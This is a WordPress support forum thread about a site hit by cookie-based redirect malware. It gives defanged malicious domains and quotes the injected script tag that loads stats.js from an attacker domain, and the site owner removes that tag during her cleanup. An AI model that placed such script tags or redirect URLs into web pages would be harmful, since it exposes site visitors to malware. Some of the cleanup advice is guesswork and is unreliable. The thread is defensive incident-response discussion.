This is infection indeed.
We cannot provide you concrete details where cure infection as it requires internal (server side) investigation of website/WordPress.
The injected JavaScript firstly going to https[://]pr[.]uustoughtonma[.]org/d.js which downloads https://stat[.]uustoughtonma.org/stats%5B.%5Djs?f=pr that finally loads cookie based redirection malware (firing every 8 hours) redirecting to
http[://]konado[.]space/?h=475053016_949e154f16a_100&h_l=&h_5=sub_id_2&h_2=def_sub
You have to perform a full internal website audit to locate and remove the malicious code injecting this malware.
Andrew Nevins
(@anevins)
WCLDN 2018 Contributor | Volunteer support
Further to Quttera’s advice, get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.
If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.
Thread Starter
Prolet
(@prolet)
Dear Quttera and Andrew Nevin,
Thank you for your support!
Andrew, these two links are my constant helpers. I am reading all the time. And this is how I cleaned my 3 other websites!
On this one I can’t! Wordfence is 100 % sure there is nothing to worry about ( Thank you for that! How to rely on this plugin at all?) while sucury is panicking me all the time.
I just found out ( for my embarrassment) the if I use the code editor on the server I will have the Doctype files…. I used the text edit only.
And yet, I have no idea how to locate the file which gives the full content of the URL.
Quttera, I will do that a full audit as you suggested!
How did you solve this problem?I have the same problem,thank you
Thread Starter
Prolet
(@prolet)
Dear nirolee,
It was a long and chaotic process. I will share with you everything I did but not in the step-by-step order.
Apparently the problem was because of plugin ultimate membership. I deleted it and no change.
It turns out that all my 4 websites were affected plus another one which is on a ubuntu server. All of them had the same problem.
– I deleted ultimate membership files. I even deleted everything related to it in the database.
– I deleted all wp files and folders ( except wp-content, wp-config and .htaccess) and uploaded all new wp
– I scanned all with Wordfence and repaired all files as suggested
– I deleted this <script type=’text/javascript’ src=’https://stat.uustoughtonma.org/stats.js?f=4′ which was between <header> and </header> in header.html file in EVERY THEME you have!
– I deleted a similar script text AFTER the </header> tag in the same files.
Eventually I was able to load the websites without the nasty redirection but when I was logged in I had the same problem.
Every time I open a dashboard I will have the redirection again.
It turns out that in the end of every page there was the same script too. I deleted it all page by page.
Also in .htacces I found this:
<Files 403.shtml>
order allow,deny
allow from all
</Files>
Every article I read about it suggest that this is a bad hack. Only one article suggested that it is a security code either from the server either from a security plugin.
My hosting company said they have no idea what this is and i deleted it. It didn’t harm any of the websites but probably helped the whole process of getting rid of the hack.
After all of that I can load the websites and work in the background without visible problems.
I hope this will help you!
Bon chance!
Thread Starter
Prolet
(@prolet)
I forgot to tell you that you must change all wp core themes. Especially take care of 2017.
